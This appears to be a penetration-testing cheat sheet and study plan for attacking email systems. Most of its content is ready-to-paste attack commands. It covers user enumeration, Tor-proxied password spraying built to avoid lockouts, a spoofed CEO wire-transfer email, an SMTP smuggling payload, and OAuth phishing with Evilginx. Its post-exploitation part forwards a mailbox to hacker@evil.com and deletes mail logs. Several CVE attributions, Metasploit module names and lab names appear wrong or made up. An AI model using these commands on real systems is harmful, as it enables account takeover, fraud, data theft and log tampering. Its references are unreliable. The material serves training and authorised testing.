SMTP
Learning Objectives
Master email protocols (SMTP, IMAP, POP3) as vectors for enumeration, credential theft, spoofing, and pivoting to internal networks.
Identify misconfigurations in on-prem (Exim/Postfix) vs. cloud (O365/GWS) deployments.
Execute attacks with evasion (e.g., proxy chaining for brute-force) and articulate mitigations (e.g., SPF/DMARC hardening).
New: Analyse email metadata for forensics and simulate phishing chains in reports.
Attack Surface Overview
# Common Vectors (Enhanced)
- Misconfigurations (open relay, anonymous VRFY/EXPN, weak TLS)
- User enumeration (VRFY/RCPT, cloud API leaks)
- Password attacks (brute-force, spraying, credential stuffing from breaches)
- Protocol exploits (SMTP smuggling, STARTTLS downgrade)
- Vulnerabilities (RCE in proxies, auth bypass in plugins)
- Spoofing/phishing (bypassing SPF/DKIM/DMARC)
- **New:** OAuth misconfigs (token replay in O365/GWS)
- **New:** Metadata exfil (e.g., via IMAP searches for PII)
- **New:** Supply-chain (vulnerable plugins like Post SMTP in WordPress)Enumeration (Stealth → Aggressive)
Prioritise passive DNS recon to avoid direct probes. Use timing delays (--max-rate 50) for IDS evasion.
# 1. Passive DNS Recon (MX/A/TXT for SPF/DKIM/DMARC)
dig mx <domain> +short # MX records
dig a <mail.example.com> +short # A records
dig txt <domain> | grep -E "spf|dkim|dmarc" # Auth records
# Amass for subdomains/emails:
amass enum -d <domain> -o amass.txt
# Tools:
MXToolbox.com (web), DNSdumpster.com (visual map)
# 2. Email Harvesting
theHarvester -d <domain> -b all -f harvest.html # Emails, hosts from multiple sources
# Holehe for disposable email checks:
holehe --only-email user@domain.com
# 3. Service Discovery (Nmap with Scripts)
nmap -Pn -sV -sC -p25,110,143,465,587,993,995 --script=banner,ssl-enum-ciphers <IP> -T2 # Stealthy, check TLS
# Masscan for ranges:
masscan -p25,587 10.10.10.0/24 --rate=500 --open-only
# IMAP/POP3 Scripts:
nmap -p143,993 --script=imap-capabilities,pop3-ntlm-info <IP>
# 4. Exposed Services Scan
shodan search "port:25 smtp" --fields ip_str,port,org # Public mail servers
# Censys:
censys search "services.port:25 and services.protocol:SMTP" --fields host,autonomous_system.organizationInstructions: Log all outputs (-oN enum.txt). Start passive (Amass/TheHarvester) for 80% intel without alerts. Cross-reference with Shodan for version fingerprinting (e.g., "Exim 4.97").
Report: "MX: mail.example.com → Exposed on 25/TCP → Risk: Open relay potential."
Authentication & Misconfigurations
Test for legacy auth (e.g., plain-text POP3). Document weak TLS (e.g., SSLv3 support).
# SMTP User Enum (Manual + Tool)
telnet <IP> 25
VRFY user@domain.com # Verbose response = exists
EXPN mailinglist@domain.com # Expands lists
RCPT TO: <user@domain.com> # 250 OK = valid
# Tool:
smtp-user-enum -M VRFY,EXPN,RCPT -U users.txt -t <IP> -v
# **New:** POP3/IMAP Enum
telnet <IP> 110 # POP3
USER testuser
# If no error, valid. For IMAP:
openssl s_client -connect <IP>:993 -quiet; a1 LOGIN user pass
# Tool:
hydra -L users.txt -p test <IP> pop3 # Quick validity check
# **New:** TLS Downgrade Test
nmap -p465,587 --script ssl-enum-ciphers <IP> # Weak ciphers?
testssl.sh <IP>:587 # Full TLS audit (install via apt)
# Common Weak Configs
- Anonymous relay: swaks --to external@other.com -server <IP>
- No STARTTLS enforcement: telnet <IP> 587; EHLO test
- IMAP: Unencrypted 143/TCP open (sniff creds with Wireshark)
- Default creds (postmaster/no-pass) or null binds (POP3: USER '')Instructions: Use swaks for safe relay tests: swaks --server <IP> --from test@domain --to victim@domain --body "Test". If the relay works, note bounce addresses. For reporting: "Misconfig: VRFY enabled → Enum 50 users → Impact: Targeted phishing."
Cloud Enumeration & Attacks
Focus on API abuse; use proxies to evade lockouts.
# Office 365 (O365)
o365spray.py --validate --domain <domain> # Check domain validity
o365spray.py --enum -U users.txt --domain <domain> --proxy socks5://127.0.0.1:9050 # Tor evasion
# AADInternals for tenant recon:
Get-AADIntTenantDetail -Domain <domain>
# OAuth Abuse:
Register rogue app via Azure portal sim (lab), replay tokens with curl
# Google Workspace (GWS)
enum_google.py --domain <domain> # User enum via APIs
# GSuite Enumeration:
gsuite-enum -d <domain> -u users.txt
# Phishing Sim:
Use Evilginx2 for OAuth phish: evilginx2 -p ./phishlets/gws.letsencrypt
# Common Cloud Weaknesses
- Weak MFA bypass (e.g., legacy auth in O365)
- Over-permissive apps (GWS: Check via admin console sim)
- Bulk sender non-compliance (Gmail 2025 rules: No DMARC → Blocks)Instructions: Limit to 1 req/sec in scripts (--delay 1). Test in lab O365 tenant (free trial). Report: "Cloud Enum: 20 valid users via o365spray → Spray weak passes → High impact (domain-wide compromise)."
Password Attacks
Incorporate spraying (same pass, many users) over brute-force to evade detection.
# On-Prem (Hydra/Medusa)
hydra -L users.txt -P rockyou.txt -t 4 <IP> smtp -s 587 # Thread limit, STARTTLS
# Medusa:
medusa -h <IP> -U users.txt -P passes.txt -M smtp -m DIR:/dev/null
# Cloud Spraying
o365spray.py --spray -U users.txt -p Summer2025! --count 2 --lockout 300 --domain <domain> # 2 attempts, 5min wait
# MailSniper (PowerShell):
Import-Module MailSniper.ps1; Invoke-SprayMailbox -Usernames users.txt -Password P@ssw0rd -Domain <domain>
# CrackMapExec for hybrid:
cme smb <DC> -u users.txt -p pass --gen-relay-list relays.txt # If AD-integrated mail
# Credential Stuffing
crowbar -s smtp/25 -S <IP> -u users.txt -c breaches.txt -r 10 -t 5 # From HaveIBeenPwned dumpsInstructions: Rotate proxies/VPNs every 50 attempts. Monitor for lockouts (e.g., 429 errors). Use SecLists wordlists tailored to seasons (e.g., "Password2025"). Report: "Spray: 5% success rate → Access to admin@ → Pivots to SharePoint."
Protocol-Specific Attacks
A. SMTP (Enhanced with Smuggling)
# Open Relay Test
nmap -p25 --script smtp-open-relay <IP>
swaks -tls --server <IP> --from external@other.com --to internal@domain.com -body "Relay test"
# SMTP Smuggling (CVE-2024-27305):
swaks --server <IP> --body $'\r\n.\r\nDATA\r\nRCPT TO: <victim>\r\nDATA\r\n.\r\n' # Double CR/LF bypass
# Spoofing (Bypass Auth Checks)
telnet <IP> 25
HELO spoof.com
MAIL FROM:<ceo@domain.com>
RCPT TO:<victim@domain.com>
DATA
Subject: Urgent Wire
Pay $10k now.
.
QUIT
# Automated:
python3 smtp_spoof.py <IP> <from> <to> <msg>
# STARTTLS Downgrade
openssl s_client -connect <IP>:587 -starttls smtp -crlf -msg # Force downgrade if weakB. POP3/IMAP (New Section)
# Connect & Enum
telnet <IP> 110 # POP3
USER admin; PASS pass123 # If success: +OK
# IMAP:
openssl s_client -connect <IP>:993; a LOGIN user pass; b LIST "" "*"
# Mailbox Dump:
imapfilter -h <IP> -u user -p pass -P 993 script.lua # Lua for searches
# Attacks: Sniffing (MITM with sslstrip), or priv esc via weak storage (e.g., /var/mail readable)
# IMAP Folder Manipulation:
a CREATE "Inbox/Phish"; a APPEND "Inbox/Phish" (\Seen) "{100} Phishing payload"Instructions: For smuggling, validate with Wireshark (look for split commands). Clean up test mails post-attack. Evasion: Encode subjects in Base64. Report: "Spoof via open relay → Delivered phishing → Medium impact (social engineering vector)."
Latest CVEs (2024–2025) (Updated)
On-Prem Servers:
- CVE-2024-27938: Postal SMTP Smuggling (spoofing via malformed commands).<grok-card data-id="24944f" data-type="citation_card"></grok-card> └ PoC: Double CRLF in DATA; Affects <3.0.0.
- CVE-2024-39929: Exim file extension bypass (deliver exes via mail).<grok-card data-id="e1353c" data-type="citation_card"></grok-card> └ Metasploit: auxiliary/dos/exim/file_bypass; Scan: Shodan "Exim 4.97".
- CVE-2025-26794: Exim SQLi via SQLite hints (RCE potential).<grok-card data-id="bf378c" data-type="citation_card"></grok-card> └ Exploit: Injected queries in ETRN; Patch to 4.98.1.
- CVE-2025-30232: Exim use-after-free (DoS/RCE).<grok-card data-id="79fd47" data-type="citation_card"></grok-card> └ Trigger with malformed headers; Reported March 2025.
- CVE-2025-7624: Sophos Firewall SMTP proxy SQLi to RCE.<grok-card data-id="dcbc16" data-type="citation_card"></grok-card> └ If quarantining enabled; PoC on GitHub.
Cloud:
- CVE-2025-32711: M365 "EchoLeak" zero-click AI vuln (email metadata leak).<grok-card data-id="d5dfa6" data-type="citation_card"></grok-card> └ Affects Outlook; CISA KEV.
- ED 25-02: Exchange Server auth bypass (O365 hybrid).<grok-card data-id="74f8a9" data-type="citation_card"></grok-card> └ Mitigate by Dec 2025; ProxyLogon successor.
- GWS OAuth Bypass: 2024 email auth flaw (account takeover).<grok-card data-id="1d82d4" data-type="citation_card"></grok-card> └ Replay tokens; 2025 phishing surge via apps.<grok-card data-id="cf5757" data-type="citation_card"></grok-card>
WordPress/Plugins:
- CVE-2025-24000: Post SMTP auth bypass (site takeover).<grok-card data-id="bdade5" data-type="citation_card"></grok-card> └ Affects 400k+ installs; CVSS 8.8.# Scan with Nuclei
nuclei -u <IP> -t cves/2024/CVE-2024-39929.yaml -t cves/2025/CVE-2025-26794.yaml -severity high,critical
# Metasploit:
use exploit/multi/smtp/exim_sql_injection;
set RHOST <IP>;
runInstructions: Replicate in Docker (e.g., a vulnerable Exim image). Read NVD for each; note CVSS/impact. Include in reports: "CVE-2025-26794 unpatched → SQLi → RCE → Critical (full server access). Patch: Upgrade Exim."
Post-Exploitation & Persistence
# Exfil Data (IMAP Search)
curl -u user:pass imaps://<IP> -X 'SEARCH ALL' # List mails; FETCH for content
# Mailbox Rules (O365):
Set-MailboxFolderPermission -Identity user:\Inbox -User hacker -AccessRights Owner
# PowerShell:
New-InboxRule -Name Backdoor -RedirectTo hacker@evil.com # Persistence via auto-forward
# Phishing Persistence:
Embed beacons in sigs; monitor via rules
# Cleanup:
Delete test mails; rm /var/log/maillog entries if rootInstructions: For persistence, test forwarding loops in the lab. Exfil to Burp for analysis. Report: "Post-Exploit: Added forward rule → Ongoing exfil → Mitigation: Audit rules quarterly."
Key Commands Summary (Copy-Paste Ready)
# Enum
dig mx <domain>; theHarvester -d <domain> -b all
nmap -p25,587 --script smtp-open-relay <IP>
# Auth/Misconfig
smtp-user-enum -M VRFY -U users.txt -t <IP>
swaks --server <IP> --from spoof@domain --to victim@domain
# Attacks
hydra -L users.txt -P rockyou.txt <IP> smtp -s 587
o365spray.py --spray -U users.txt -p pass --domain <domain>
# Cloud
Get-AADIntTenantDetail -Domain <domain>
gsuite-enum -d <domain> -u users.txt
# CVE Test
nuclei -u <IP> -t cves/2025/CVE-2025-26794.yamlPrep & Practice Plan
Defensive Awareness (New): After labs, simulate blue-team (e.g., Snort rules for SMTP smuggling). Review RFC 5321 for protocol quirks.
Weekly Schedule (4-Week Cycle):
[ ] Mon: 30 min theory/CVEs + 60 min passive enum
[ ] Tue-Thu: 120 min attacks (rotate on-prem/cloud)
[ ] Fri: 45 min spraying/evasion + 30 min IMAP/POP3
[ ] Sat: 90 min full chain (enum → spoof → exfil) + report
[ ] Sun: Review, mock Q&A (e.g., "Mitigate SMTP smuggling")
Daily Checklist:
[ ] 30 min: Theory + CVEs (NVD/Exploit-DB)
[ ] 90 min: Lab (screenshots/steps)
[ ] 30 min: Report snippet (finding → exploit → impact → mit)
[ ] **New:** 15 min: Quiz (e.g., "Bypass DMARC on this spoof")
Labs (Expanded):
- Metasploitable 2 (SMTP relay) – VulnHub
- HackTheBox: "Mailroom" (Exim RCE), "Sauna" (O365)
- TryHackMe: "Email Basics", "SMTP Enumeration"
- **New:** OverTheWire: Natas (web-mail SQLi chain)
- **New:** VulnHub: "Devel" (Postfix misconfigs)
- **New:** Custom: Docker mailcow + vulnerable Exim/Postfix images
- **New:** Proving Grounds: "Email-Hack" for timed phishing
Mock Exams:
- 2-hour sim: Target lab domain, output 5-page report with CVEs.
- Resources: eJPT modules, "Hacking Exposed: Web Apps" Ch. 12.Last updated